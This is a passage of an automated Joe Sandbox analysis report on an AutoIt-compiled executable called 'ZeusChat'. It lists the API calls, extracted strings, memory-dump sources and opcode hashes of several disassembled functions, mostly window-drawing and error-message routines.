                                                                                                      • Opcode Fuzzy Hash: f6b3e33df0b6fd49e851f84cb0d7e1a0081305ee093791da2a064367007aa246
                                                                                                      • Instruction Fuzzy Hash: 92A1E536F06A0286EB64AB61DC4467DA761BB49B64F884330CE2E13BD4DF7D984CC360
                                                                                                      Function 00007FF7520AF418 Relevance: 39.2, APIs: 26, Instructions: 179windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF45F
                                                                                                      • SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF46A
                                                                                                      • GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF485
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF498
                                                                                                      • CreateSolidBrush.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4A2
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4C3
                                                                                                      • CreatePen.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4DA
                                                                                                      • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4EB
                                                                                                      • SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4FB
                                                                                                      • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF50E
                                                                                                      • InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF535
                                                                                                      • RoundRect.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF561
                                                                                                      • GetWindowLongW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF56F
                                                                                                      • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF5BC
                                                                                                      • GetWindowTextW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF5F4
                                                                                                      • InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF617
                                                                                                      • DrawFocusRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF625
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF634
                                                                                                      • SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF63F
                                                                                                      • DrawTextW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF65D
                                                                                                      • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF67B
                                                                                                      • DeleteObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF689
                                                                                                      • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF697
                                                                                                      • DeleteObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF6A2
                                                                                                      • SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF6AE
                                                                                                      • SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF6BE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                      • String ID:
                                                                                                      • API String ID: 1996641542-0
                                                                                                      • Opcode ID: e7723dbef953c17b05f3a04d1756e8a1bd39c10ad02639bf65342523599ff9cc
                                                                                                      • Instruction ID: 186e0602eacdc0904897579a8a5138dbf5a98a2b5992f8f680647464f0d57c08
                                                                                                      • Opcode Fuzzy Hash: e7723dbef953c17b05f3a04d1756e8a1bd39c10ad02639bf65342523599ff9cc
                                                                                                      • Instruction Fuzzy Hash: 5471A336A0AA4186E764AB21EC4473EB761FB89BA0F844334DE5E43794DFBCD848C710
                                                                                                      Function 00007FF752002340 Relevance: 28.7, APIs: 19, Instructions: 201COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$LongWindow$ModeObjectStockText
                                                                                                      • String ID:
                                                                                                      • API String ID: 554392163-0
                                                                                                      • Opcode ID: cc65a1f5085739bdf730f5a57d68a81d83072d1dd34cd411bf68f0558776c384
                                                                                                      • Instruction ID: 2729d0981b1df4f1ca23f0a240b3fa1deae4872d1c4e88c6c8285cf68eabe939
                                                                                                      • Opcode Fuzzy Hash: cc65a1f5085739bdf730f5a57d68a81d83072d1dd34cd411bf68f0558776c384
                                                                                                      • Instruction Fuzzy Hash: 1D81D631D0E65286FA70AB299C5827DA392EF49B54FDD4231C95D032E4DE7CB84AC360
                                                                                                      Function 00007FF7520B19D4 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162windowfileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                      • API String ID: 2091158083-3440237614
                                                                                                      • Opcode ID: a6383f7ad2c15784484526503c134a2164f43bfe7e3a3a9e6e3dd31a7eae073a
                                                                                                      • Instruction ID: 2fe4ed7a0bbc0e1065a0eb0eec2355033c7c78574fe8fd04b0231600c32a1036
                                                                                                      • Opcode Fuzzy Hash: a6383f7ad2c15784484526503c134a2164f43bfe7e3a3a9e6e3dd31a7eae073a
                                                                                                      • Instruction Fuzzy Hash: 4B714D32619A8296E720EB25EC547EDE721FB84794FC80032DA4D07A99DFBCD54EC710
                                                                                                      Function 00007FF7520B0898 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 175windowlibraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                      • API String ID: 258715311-1154884017
                                                                                                      • Opcode ID: 6a1298940e1642c5f8eac90391968d97117fa4591b4f58ce6483caa2bbefa5f3
                                                                                                      • Instruction ID: 1b4dfd9c7540f434bca6ca1bb542ea9a6bb56755edc5f42b3a247795ca11bc90
                                                                                                      • Opcode Fuzzy Hash: 6a1298940e1642c5f8eac90391968d97117fa4591b4f58ce6483caa2bbefa5f3
                                                                                                      • Instruction Fuzzy Hash: 4E71B732A0AB1282EB70AF21DC4477EA6A5FB45B94F884635DD1D47794DFBDD848C320
                                                                                                      Function 00007FF7520B0B50 Relevance: 22.6, APIs: 15, Instructions: 131filememorywindowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$File$CloseCreateHandleObject$#418AllocCopyDeleteFreeImageLockMessageReadSendSizeStreamUnlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 2779716855-0
                                                                                                      • Opcode ID: 5ce09494ab24ac1ed07fa16ca7819eb05e9d682ed7dc52cd5bd0682f6ced3240
                                                                                                      • Instruction ID: 9d80d41e4f30f37d7644cd909dfdc3b84bb9ab7e5b2853f382796cdeac184698
                                                                                                      • Opcode Fuzzy Hash: 5ce09494ab24ac1ed07fa16ca7819eb05e9d682ed7dc52cd5bd0682f6ced3240
                                                                                                      • Instruction Fuzzy Hash: FC518A36B06B0186EB64EF62E854A6D77A1FB48B99F984131DE1E03B04DF7DD809C710
                                                                                                      Function 00007FF7520815FC Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 388COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                      • API String ID: 0-3931177956
                                                                                                      • Opcode ID: 38560f2f3fa774d15aa6a8c65f2969727263349bd26c7da2756ce7c29d18a3b4
                                                                                                      • Instruction ID: 79b7a43629565cc9742dca41f6d754c3895df3e7428876dec6a0fe47e4a4fe88
                                                                                                      • Opcode Fuzzy Hash: 38560f2f3fa774d15aa6a8c65f2969727263349bd26c7da2756ce7c29d18a3b4
                                                                                                      • Instruction Fuzzy Hash: CF027436A0A64285FA58BB29D95417EF3B0FF44B80F8D4135CA0E07A95DFBDE959C320
                                                                                                      Function 00007FF75206B6A8 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: NULL Pointer assignment
                                                                                                      • API String ID: 0-2785691316
                                                                                                      • Opcode ID: 3cbbc719979583f5783d410f4d2771c0b32c38c29e3e03eccb0298c3601c94f3
                                                                                                      • Instruction ID: 9ea9abf1ef4ac34be2c93435ca3180c00865565267f57a05fe5bf028e3f21fb4
                                                                                                      • Opcode Fuzzy Hash: 3cbbc719979583f5783d410f4d2771c0b32c38c29e3e03eccb0298c3601c94f3
                                                                                                      • Instruction Fuzzy Hash: CF518372B16A5289EB50EF21DC807BCB770FB84B88F884031DA0E57A55DF78E449C350
                                                                                                      Function 00007FF75207AA78 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188windowsleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                      • String ID: P
                                                                                                      • API String ID: 1460738036-3110715001
                                                                                                      • Opcode ID: bc901e50a334b4a7c78d094858a5c527965ee132f71a92aa0f5dc32a9aa332c1
                                                                                                      • Instruction ID: 4d4848138e933bb88868e26b2f54bae3cb3cf14198bf36d5a4b01a9dd8b432a7
                                                                                                      • Opcode Fuzzy Hash: bc901e50a334b4a7c78d094858a5c527965ee132f71a92aa0f5dc32a9aa332c1
                                                                                                      • Instruction Fuzzy Hash: 6071C626A0E59256F760FB659C507BEA762FB84748FDC4031DA4E07685DEBCE84EC320
                                                                                                      Function 00007FF752003B64 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003BA6
                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003BBB
                                                                                                      • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003C35
                                                                                                        • Part of subcall function 00007FF752002BEC: GetFullPathNameW.KERNEL32(?,00007FF752003C67,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752002C4D
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003CCC
                                                                                                      • MessageBoxA.USER32(?,?,?,?,?,00007FF752002BC1), ref: 00007FF75204AA96
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF752002BC1), ref: 00007FF75204AAE3
                                                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,00007FF752002BC1), ref: 00007FF75204AB6A
                                                                                                      • ShellExecuteW.SHELL32(?,?,?,?,?,00007FF752002BC1), ref: 00007FF75204AB91
                                                                                                        • Part of subcall function 00007FF752003CEC: GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D06
                                                                                                        • Part of subcall function 00007FF752003CEC: LoadCursorW.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D16
                                                                                                        • Part of subcall function 00007FF752003CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D2B
                                                                                                        • Part of subcall function 00007FF752003CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D44
                                                                                                        • Part of subcall function 00007FF752003CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D5D
                                                                                                        • Part of subcall function 00007FF752003CEC: LoadImageW.USER32 ref: 00007FF752003D89
                                                                                                        • Part of subcall function 00007FF752003CEC: RegisterClassExW.USER32 ref: 00007FF752003DED
                                                                                                        • Part of subcall function 00007FF752003E24: CreateWindowExW.USER32 ref: 00007FF752003E74
                                                                                                        • Part of subcall function 00007FF752003E24: CreateWindowExW.USER32 ref: 00007FF752003EC7
                                                                                                        • Part of subcall function 00007FF752003E24: ShowWindow.USER32 ref: 00007FF752003EDD
                                                                                                        • Part of subcall function 00007FF75200477C: Shell_NotifyIconW.SHELL32 ref: 00007FF752004874
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                                                      • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                      • API String ID: 1593035822-2030392706
                                                                                                      • Opcode ID: 1b2e34a7381e4e35feefe2342ee61d9da47ff135a521147e2ec28fd6c13dfd44
                                                                                                      • Instruction ID: a02c0ad9443ce292b20a08c78249b3ffba5246b369950845777f370edf83e367
                                                                                                      • Opcode Fuzzy Hash: 1b2e34a7381e4e35feefe2342ee61d9da47ff135a521147e2ec28fd6c13dfd44
                                                                                                      • Instruction Fuzzy Hash: 19614961A5F6839AFA60FB20EC805F9E761BF41354FC84032D58D065AADFACE54EC720
                                                                                                      Function 00007FF752083C14 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 135COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LoadStringwprintf
                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                      • API String ID: 3297454147-3080491070
                                                                                                      • Opcode ID: b1c87d20e2fab5ea52848e67197744439dd02fd7dad917650ee75d30fdaea2ed
                                                                                                      • Instruction ID: 5572c3787ff294ab37ce769bc9ce3210dee71b9a63d517a0a58ce390797ded44
                                                                                                      • Opcode Fuzzy Hash: b1c87d20e2fab5ea52848e67197744439dd02fd7dad917650ee75d30fdaea2ed
                                                                                                      • Instruction Fuzzy Hash: 56615F22A1AA5295FB14FB24EC405FDA721FB84744FC80032EA4D5769ADFBDE50EC720
                                                                                                      Function 00007FF752077A88 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 128windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                      • API String ID: 4051287042-2268648507
                                                                                                      • Opcode ID: 62d3efdd22561061cae8cb835c91bde9e20e159738d326f93298747da2c55c00
                                                                                                      • Instruction ID: 5501d8c32d91bb808a4a224354131f03e1087897b6aaf67dcdbc208531c23995
                                                                                                      • Opcode Fuzzy Hash: 62d3efdd22561061cae8cb835c91bde9e20e159738d326f93298747da2c55c00
                                                                                                      • Instruction Fuzzy Hash: F5516221B1AA5691EA10FB60EC415BDA321FF84754FC84032EA4D5769ADFBCD50EC750
                                                                                                      Function 00007FF7520015EC Relevance: 18.2, APIs: 12, Instructions: 191timeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1974058525-0
                                                                                                      • Opcode ID: c5a335280972faf6a49444eab98031eca0eed2acb66a1a220016335a9642b9bc
                                                                                                      • Instruction ID: c26bd59ca8f1797a3e54361242edd81cb2498f7ed9ead1ea60f5ac973668a2c3
                                                                                                      • Opcode Fuzzy Hash: c5a335280972faf6a49444eab98031eca0eed2acb66a1a220016335a9642b9bc
